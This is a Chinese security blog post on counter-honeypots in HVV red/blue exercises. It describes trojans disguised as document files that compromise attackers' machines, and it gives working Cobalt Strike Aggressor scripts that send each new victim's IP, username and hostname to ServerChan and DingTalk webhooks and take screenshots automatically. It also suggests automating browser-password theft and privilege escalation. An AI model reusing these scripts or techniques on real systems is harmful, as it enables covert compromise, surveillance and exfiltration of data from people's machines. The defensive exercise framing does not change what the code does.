实战|2023HVV反制蜜罐上线提醒实例以及思考

一颗小胡椒2023-08-21 09:53:02

0x01

前言

现阶段蓝队防守不单单仅限制于传统的ip封禁以及高交互蜜罐的监控以及简单的身份溯源,红队攻击信息上报以及攻击方式多样化,包括参与攻击的人员不单单限制于上报人员,所以对于蓝队来讲溯源难度要匹配红队上报信息也是存在一定的难度,所以在攻防演练中蓝队的得分难度相对来说更难一点儿。

0x02 

思路

高交互蜜罐在拖延攻击时间上来讲确实有一定的帮助,有助于写防守报告,这种在得分上来讲还是比较容易匹配到红队的"攻击成果"。

反制蜜罐的目的是拿攻击者的权限,那么目前只是单纯的要拿攻击队机器的数据,那么该数据信息获取途径或者说证明途径

  • 截图,攻击机截图
  • 攻击机浏览器存储账号密码
  • 攻击机浏览器历史记录

免杀

没有免杀的马是没有意义的,另外仅仅存在免杀的木马也是没有意义的。早在今年年初我们团队其实就已经实现了,从免杀木马与文件无感知交互的功能,在上线难度来说,点击即可上线,点击后的效果就是文件满足任意文件类型,包括doc、docx、xlsx等,对接高交互蜜罐系统,方便溯源报告,比如下面这种点击木马上线后无感知,攻击者看到的效果就是下图内容。

优势

对蓝队来讲,只需放饵即可,对于红队来讲,在攻击手法上效果更好,无感知中毒。

题外话对于钓鱼的弊端来讲腾讯、网易这些邮箱厂商,对于邮件的打标签比较严重,批量成为难度,阈值的话自己测试。

0x03

上线提醒

对于蓝队来说,目前实现上线提醒,包括攻击机上线自动化执行是成为得分的重要环节。那么实现的思路,目前的话我们是从这几点出发:

  • 提醒的话可以根据日志来实现,CS木马上线之后log目录存在日志。可利用python脚本监控日志报警
  • 插件提醒,利用CS插件提醒。微信或者其它攻击webhook

这里主要说第二种方式。

推荐一个插件。

https://github.com/d3ckx1/CS_Online_reminder/tree/main/weixin

这个脚本中提供了,微信调用提醒,不过可以联动其它软件,比如说飞书或者钉钉等其它工具

on beacon_initial {
  sub http_get {    local('$output');    $url = [new java.net.URL: $1];    $stream = [$url openStream];    $handle = [SleepUtils getIOHandle: $stream, $null];      @content = readAll($handle);      foreach $line (@content) {      $output .= $line . "\r\n";    }      println($output);  }  $internalIP = replace(beacon_info($1, "internal"), " ", "_");  $userName = replace(beacon_info($1, "user"), " ", "_");  $computerName = replace(beacon_info($1, "computer"), " ", "_");  $url = 'https://sc.ftqq.com/xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.send?text=CobaltStrike%20Online%20Reminder&desp=%0D%0A%0D%0AIP:'.$internalIP.'%0D%0A%0D%0AUserName:'.$userName.'%0D%0A%0D%0AHostName:'.$computerName;    http_get($url);
}

这里利用了方糖的api,需付费使用,说实话能自己调试代码走钉钉的话,一个月8块省下了,交互方式如图

缺点就是花钱,数据经过第三方转发。不建议使用,非会员的测试数5条

使用需配置key

界面提醒如下

群发的话,接dding

效果如下:

当然参数的话自己选择,代码怎么改看自己心情。

0x04

小结

为什么说不建议使用,第一数据经第三方服务端,第二*糖的机制限定

| 单 IP 每天 API 最大请求次数 | 5000 |

| ---------------------------- | ---- |

| 单 UID 每天 API 最大请求次数 | 1000 |

0x05

Tricks

拓展一下,单独的提醒能满足一部分需求,但是解决不了蓝队或者红队最大的需求,那么如何实现自动化需要考虑一下。

有时间分享一下上线自动化功能,有兴趣的可以尝试一下自动化,不单单指上线提醒自动化,还包含执行自动化,结合前面思路。

下面分享一个Ggoodstudy师傅分享的自动化插件,可以直接调用第三方接口,接钉钉即可。

#---AuthOr:Ggoodstudy---$dt_bot_webhookURL = 'https://oapi.dingtalk.com/robot/send?access_token=xxxxxxxxxxxxxxxxxxx';$targetInfo_txt = " ----存在新上线主机----\n>";$listener_txt = "监听:";$externalIp_txt = "  \n  公网IP:";$internalIp_txt = "  \n  内网IP:";$computerName_txt = "  \n  主机名:";$userName_txt = "  \n  当前用户:";on beacon_initial {    local('$internalIP $computerName $userName');    $internalIP = replace(beacon_info($1, "internal"), " ", "_");    $externalIP = replace(beacon_info($1, "external"), " ", "_");    $computerName = replace(beacon_info($1, "computer"), " ", "_");    $userName = replace(beacon_info($1, "user"), " ", "_");    $listennerName = replace(beacon_info($1, "listener"), " ", "_");    #修改睡眠时间    bsleep($1, 10, 10);    $dt_msg = "{\"msgtype\": \"markdown\",\"markdown\": {\"title\":\"新主机上线\",\"text\":'.'\"'.$targetInfo_txt.$listener_txt.$listennerName.$externalIp_txt.$externalIP.$internalIp_txt.$internalIP.$computerName_txt.$computerName.$userName_txt.$userName.'\"'.'}}";    @curl_command = @('curl', '-H', 'Content-Type: application/json', '-d',$dt_msg,$dt_bot_webhookURL);    $process = exec(@curl_command);    binput($1, "printscreen");    bprintscreen($1);    #10s截图一次    sleep(10 * 1000);    bprintscreen($1);}

所以其它的功能有兴趣的师傅可以尝试一下,比如说自动化爬取浏览器存储账号密码以及自动化提权做定时任务,完全是可行的。

beacon免杀
本作品采用《CC 协议》,转载必须注明作者和本文链接
从零开始开发CS beacon
2021-12-21 16:01:20
因为我也才学golang,基本面向github编程,在网上只找到python版加解密的方式,所以需要翻译成go语言。
Go初探
2021-12-08 09:26:58
由于各种av的限制,我们在后门上线或者权限持久化时很容易被软查杀,容易引起目标的警觉同时暴露了自己的ip。尤其是对于windows目标,一个的后门极为关键,如果后门文件落不了地,还怎么能进一步执行呢?关于后门,网上的介绍已经很多了,原理其实大同小异。看了很多网上的案例,发现网上比较多都是用C/C++和python来进行,但是很多已经被软看的死死的。
近年来,大量的后渗透利用(Post-Exploitation)工具包、自定义恶意软件和开源远程控制木马(RAT)等具备丰富的检测规避技术和反溯源能力的工具,活跃于各种实战对抗演练、勒索攻击甚至是具有国家背景的APT攻击之中。入侵者可以运用这类工具进行终端行为以及网络通信流量的
Windows中主要的异常处理机制:VEH、SEH、C++EH。 SEH中文全称:结构化异常处理。就是平时用的__try __finally __try __except,是对c的扩展。 VEH中文全称:向量异常处理。一般来说用AddVectoredExceptionHandler去添加一个异常处理函数,可以通过第一个参数决定是否将VEH函数插入到VEH链表头,插入到链表头的函数先执行,如果为
在大型企业边界安全做的越来越好的情况下,不管是APT攻击还是红蓝对抗演练,钓鱼和水坑攻击被越来越多地应用。 钓鱼往往需要技术的支撑,但本章只讲述钓鱼和些许技术,系列学习在后续讲解。
powershell对抗AV技巧
2021-06-30 22:32:22
今天介绍利用powershell上线来绕过AV防护,并介绍绕过添加用户的拦截的方式。
前言之前hvv的时候有条件钓鱼的情况下也没有想着去尝试,一方面是的工作没准备好。2022.11.15:花了几天写了这个,但是发现对于钓鱼的话效果其实还是不行,所以这篇就单纯记录下了,白加黑的方式还是更适合做权限维持,这篇笔记仅供大家参考0X00????启动为了更好的起到和适配环境原因,所以启动的四步操作均通过汇编来进行实现,之后各个语言只需要通过shellcode加载器进行加载这段shellcode即可python shellcode loaderimport ctypesimport sys
cobaltstrike4.5特征消除2修改了内置stage的配置,实现硬性特征消除修改部分payload,实现基本修改checksum8 判等参数public static long checksum8 {. 修改随机生成算法写入方法,传值 public static void main {. 修改传值修改common/CommonUtils的public static String MSFURI {. string = "/" + pick + pick + pick + pick;
CobaltStrike ShellCode详解
2022-08-04 16:51:50
接下来就是重点了,加载起来的这段shellcode开头先将DF标志位置0,这里为什么这样做后面会提到。
一颗小胡椒
暂无描述